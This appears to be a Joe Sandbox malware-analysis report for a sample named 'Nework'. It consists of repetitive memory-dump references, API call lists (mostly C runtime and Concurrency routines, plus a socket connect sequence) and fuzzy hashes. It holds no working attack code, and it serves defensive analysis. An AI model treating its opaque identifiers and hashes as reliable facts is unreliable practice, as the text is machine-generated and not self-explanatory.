                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: list too long
                                                                            • API String ID: 0-1124181908
                                                                            • Opcode ID: 47381237c837bd50a37397070e4fbc0200c3b5024582b077d7d29c1072aa11db
                                                                            • Instruction ID: 8b46f54d1c09eccbe14e6bd8f9f50d3b4fb75fc04e814c328dbb283e52790fce
                                                                            • Opcode Fuzzy Hash: 47381237c837bd50a37397070e4fbc0200c3b5024582b077d7d29c1072aa11db
                                                                            • Instruction Fuzzy Hash: 8B51E575D04758ABDB20DF64CC89BA9F3B8EF25700F004199F90DA7281EB74AA81CF91
                                                                            APIs
                                                                            • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 001C16E2
                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 001C1701
                                                                            • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 001C1748
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::$ExecutionFreeIdleProcessorProxy::Root::SpinSuspendThreadUntilVirtualstd::invalid_argument::invalid_argument
                                                                            • String ID: pContext
                                                                            • API String ID: 1284976207-2046700901
                                                                            • Opcode ID: c7708e34f894ff30887286889b7cacc1e5284051346846506498bf9decacc774
                                                                            • Instruction ID: 2c641ba63d420ae12dc59a60acebeb7991f4fdb5f1d0504c648b3d0613dbd4ef
                                                                            • Opcode Fuzzy Hash: c7708e34f894ff30887286889b7cacc1e5284051346846506498bf9decacc774
                                                                            • Instruction Fuzzy Hash: 2C21E735780615ABCB09AB68D895FBD73A5BFB6324B05015EF512872D3CFA4EC428E81
                                                                            APIs
                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,001C63C2,?,?,001C638A,?,?,?), ref: 001C63E2
                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001C63F5
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,001C63C2,?,?,001C638A,?,?,?), ref: 001C6418
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                            • API String ID: 4061214504-1276376045
                                                                            • Opcode ID: 9ed0c5f94ec8d451863953a1918cee868bc77f033b50fd05ef2ff0f0a3e5f461
                                                                            • Instruction ID: 41fc5ef1504e1b45e5b6a3f847231e62064675222efe1e0c5c9d5dba643f99c8
                                                                            • Opcode Fuzzy Hash: 9ed0c5f94ec8d451863953a1918cee868bc77f033b50fd05ef2ff0f0a3e5f461
                                                                            • Instruction Fuzzy Hash: 06F02030A01228FBCB228BC0CD0DF9EBBB9EB04746F004064F800A51A0CBB0CE81DBA0
                                                                            APIs
                                                                            • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 001BD9C4
                                                                              • Part of subcall function 001B8D8F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 001B8DB0
                                                                            • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 001BDA23
                                                                            • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 001BDA49
                                                                            • Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 001BDA69
                                                                            • Concurrency::location::_Assign.LIBCMT ref: 001BDAB6
                                                                              • Part of subcall function 001C118F: Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 001C11D4
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerStealerThrowTraceWork
                                                                            • String ID:
                                                                            • API String ID: 1879022333-0
                                                                            • Opcode ID: 6ca75b6953745da0386f722f6f8a502d1f85d05ff9c7b2479055cd6611ac24b7
                                                                            • Instruction ID: e8c72d3e055b3bd8679fc81388a223af07b0e64e69b27f38f119558b1c48e7ba
                                                                            • Opcode Fuzzy Hash: 6ca75b6953745da0386f722f6f8a502d1f85d05ff9c7b2479055cd6611ac24b7
                                                                            • Instruction Fuzzy Hash: 08410F71604210ABCF1EAB64D886BFDBBB9AF55320F094099E4069B282DF34AD44C7E1
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 001AEB4D
                                                                            • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 001AEB77
                                                                              • Part of subcall function 001AF23D: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 001AF25A
                                                                            • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 001AEBF4
                                                                            • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 001AEC26
                                                                            • __freea.LIBCMT ref: 001AEC4C
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__freea
                                                                            • String ID:
                                                                            • API String ID: 2497068736-0
                                                                            • Opcode ID: 238cddff23588f242280a14277c84cb951f646f7234ba66fb093cf77f61bf545
                                                                            • Instruction ID: 728bd47a7010e2d8f1a3e60f0b801e257d13ad4033aaabfece69297248e68cb4
                                                                            • Opcode Fuzzy Hash: 238cddff23588f242280a14277c84cb951f646f7234ba66fb093cf77f61bf545
                                                                            • Instruction Fuzzy Hash: CC318FB9A002058BCB19DFA8C5855ADB7F5EF1A310F25406EE406E7340DB349E06CBA1
                                                                            APIs
                                                                            • getaddrinfo.WS2_32(?,00000000,?,?), ref: 0019DC7C
                                                                            • FreeAddrInfoW.WS2_32(?), ref: 0019DC9D
                                                                            • socket.WS2_32(00000002,00000001,00000000), ref: 0019DCC5
                                                                            • connect.WS2_32(00000000,?,00000010), ref: 0019DCD7
                                                                            • closesocket.WS2_32(00000000), ref: 0019DCF1
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddrFreeInfoclosesocketconnectgetaddrinfosocket
                                                                            • String ID:
                                                                            • API String ID: 242599585-0
                                                                            • Opcode ID: 2f4ddc932eb7ca4690f083163cae5e8db6ec1732cb2ff62d0cc9a01f480d59b6
                                                                            • Instruction ID: 972ba39c9edad65d7059376004b1478317073a9ab1e189e2f573a84df57b315a
                                                                            • Opcode Fuzzy Hash: 2f4ddc932eb7ca4690f083163cae5e8db6ec1732cb2ff62d0cc9a01f480d59b6
                                                                            • Instruction Fuzzy Hash: 71219A71D082545BDB259B90EC8AFADB3B8DF28710F10009EF90D9B681D7B5AA809F61
                                                                            APIs
                                                                            • __EH_prolog3_catch.LIBCMT ref: 001B9AFC
                                                                            • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 001B9B48
                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 001B9B5E
                                                                            • Concurrency::SchedulerPolicy::_ResolvePolicyValues.LIBCONCRT ref: 001B9BA0
                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 001B9BCA
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::PolicyPolicy::_Schedulerstd::bad_exception::bad_exception$H_prolog3_catchResolveValidValueValues
                                                                            • String ID:
                                                                            • API String ID: 921398678-0
                                                                            • Opcode ID: a5d0461ebec79cb83eaadf723e319192892034522d07669542d576b439039d7b
                                                                            • Instruction ID: bbd5722a0819a5ee409de2e6dfd2dad007f69611c0bf2038f4c6814b5c874058
                                                                            • Opcode Fuzzy Hash: a5d0461ebec79cb83eaadf723e319192892034522d07669542d576b439039d7b
                                                                            • Instruction Fuzzy Hash: FA21C575904508DFCB09EF64EA82DEDBBB4EF15310F20406AF611AB291EB306E02CB51
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _free
                                                                            • String ID: *?
                                                                            • API String ID: 269201875-2564092906
                                                                            • Opcode ID: 361775e34eedbd1bdbc167df2203a07f2afa5a8c808378320acde1b58283f0c3
                                                                            • Instruction ID: 0ed7f9af3e1d93d9d7736aa52a4255309696f5ab04eb962096c38f1b0d938ece
                                                                            • Opcode Fuzzy Hash: 361775e34eedbd1bdbc167df2203a07f2afa5a8c808378320acde1b58283f0c3
                                                                            • Instruction Fuzzy Hash: 1E611A75E002199FDB14DFA8D881AAEFBB5EF68314B25816EE855A7300D731EE41CB90
                                                                            APIs
                                                                            • RtlEncodePointer.NTDLL(00000000), ref: 001C54E0
                                                                            • CatchIt.LIBVCRUNTIME ref: 001C55C6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CatchEncodePointer
                                                                            • String ID: MOC$RCC
                                                                            • API String ID: 1435073870-2084237596
                                                                            • Opcode ID: 1e09c3a3a18c459f9dadb9b2b69296c1b939c813d70ae0e3264338c429e1d436
                                                                            • Instruction ID: 0a48f3a9a88c7098cb9fc116c2a26eb978e4a9bdc789208bd3835f251d857d47
                                                                            • Opcode Fuzzy Hash: 1e09c3a3a18c459f9dadb9b2b69296c1b939c813d70ae0e3264338c429e1d436
                                                                            • Instruction Fuzzy Hash: D5416872900609AFCF16DF94CD81FAEBBB6FF68304F188059F904A6211D735EA90DB51
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _strrchr
                                                                            • String ID:
                                                                            • API String ID: 3213747228-0
                                                                            • Opcode ID: 252ff07006b2f6a787f521d242bcd70294969d1d0532ed7bd0a6630bee3fff95
                                                                            • Instruction ID: 526de51a03aeb26733f9e98a27ae5885a276ce6ab347e99fb9ed51c6f1339df5
                                                                            • Opcode Fuzzy Hash: 252ff07006b2f6a787f521d242bcd70294969d1d0532ed7bd0a6630bee3fff95
                                                                            • Instruction Fuzzy Hash: 30B113329046869FDB15CF68C892FAEBBE5EF65340F14816EE849EB241D734CD41CBA1
                                                                            APIs
                                                                            • GetVersionExW.KERNEL32(0000011C,?,53C1E996), ref: 00198269
                                                                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001982D0
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 001982D7
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProcVersion
                                                                            • String ID:
                                                                            • API String ID: 3310240892-0
                                                                            • Opcode ID: e50960e2e153c90c383ac980ff1201b7250ff8faf7edd17e67a717cfc3a7c346
                                                                            • Instruction ID: 270903511840cc9857ea626f546369079d2dc68ec8ab523f31724b764d054bf0
                                                                            • Opcode Fuzzy Hash: e50960e2e153c90c383ac980ff1201b7250ff8faf7edd17e67a717cfc3a7c346
                                                                            • Instruction Fuzzy Hash: 4C511571D002089BDF14EB68CD49BEDBB75EB56710F504298E809A73D1EB759BC08B91
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: EqualOffsetTypeids
                                                                            • String ID:
                                                                            • API String ID: 1707706676-0
                                                                            • Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                                                                            • Instruction ID: b7973d431cbe7b3061b2b190270ed4a3ba34e3499196d4c09c829b3077c9e8d1
                                                                            • Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                                                                            • Instruction Fuzzy Hash: 0851993990824A9FDF10CF68C4A1BAEBBF4EF25314F14449EE891A7251D732ED44CB91
                                                                            APIs
                                                                            • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 001B2B6F
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: BuffersConcurrency::details::InitializeManager::Resource
                                                                            • String ID:
                                                                            • API String ID: 3433162309-0
                                                                            • Opcode ID: 5d3f59949baf02e60cae195b96ffdcd3116755ae323aed687cec58a84e0be097
                                                                            • Instruction ID: b0cd583a9d193b00a6ee1d075461c26baa4ccf695f33df6e807aedd95ba40568
                                                                            • Opcode Fuzzy Hash: 5d3f59949baf02e60cae195b96ffdcd3116755ae323aed687cec58a84e0be097
                                                                            • Instruction Fuzzy Hash: 12314875A00309DFCF15EF94C9C0AEE7BB9BF54310F1404AAD905AB246DB70A949DBA1
                                                                            APIs
                                                                              • Part of subcall function 001C682C: _free.LIBCMT ref: 001C683A
                                                                              • Part of subcall function 001CE716: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,001D4BB0,?,00000000,00000000), ref: 001CE7B8
                                                                            • GetLastError.KERNEL32 ref: 001CD7A7
                                                                            • __dosmaperr.LIBCMT ref: 001CD7AE
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 001CD7ED
                                                                            • __dosmaperr.LIBCMT ref: 001CD7F4
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                            • String ID:
                                                                            • API String ID: 167067550-0
                                                                            • Opcode ID: d03c225463a6e4ca94e823cfe0510f3f16b419a8385e62d2ef45cc0aa55f966d
                                                                            • Instruction ID: e64aee64109717c109e6bca79b1275a55f80b955cd1c05bf53934c4e170e7f8b
                                                                            • Opcode Fuzzy Hash: d03c225463a6e4ca94e823cfe0510f3f16b419a8385e62d2ef45cc0aa55f966d
                                                                            • Instruction Fuzzy Hash: E521B671604305AF9B20AFA5ACC1F6BB7ADEF34364710453DF92997550D771EC409B90
                                                                            APIs
                                                                            • SetEvent.KERNEL32(?,00000000,?), ref: 001C0949
                                                                            • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 001C0931
                                                                              • Part of subcall function 001B8D8F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 001B8DB0
                                                                            • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 001C09AC
                                                                            • SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,001EF4A8), ref: 001C09B1
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Context$Event$Base::Concurrency::details::$Trace$SwitchThreadThrow
                                                                            • String ID:
                                                                            • API String ID: 2734100425-0
                                                                            • Opcode ID: 142d610ff27f608dbf0a277e454fe34c253840fee8ebb27ca347cd75ce56ca18
                                                                            • Instruction ID: 6943aee6b4f8587be150114a60ccfde8a98889378a9913b44d2e82617a8f4a76
                                                                            • Opcode Fuzzy Hash: 142d610ff27f608dbf0a277e454fe34c253840fee8ebb27ca347cd75ce56ca18
                                                                            • Instruction Fuzzy Hash: 7F21F971600615AFD705E798CC85EAEB7BCEF98724B05411AFA19A32D1CB70ED41CAA1
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,?,001C67AA,?,?,?,?,001C73DE,?), ref: 001CA466
                                                                            • _free.LIBCMT ref: 001CA4C3
                                                                            • _free.LIBCMT ref: 001CA4F9
                                                                            • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,001C67AA,?,?,?,?,001C73DE,?), ref: 001CA504
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
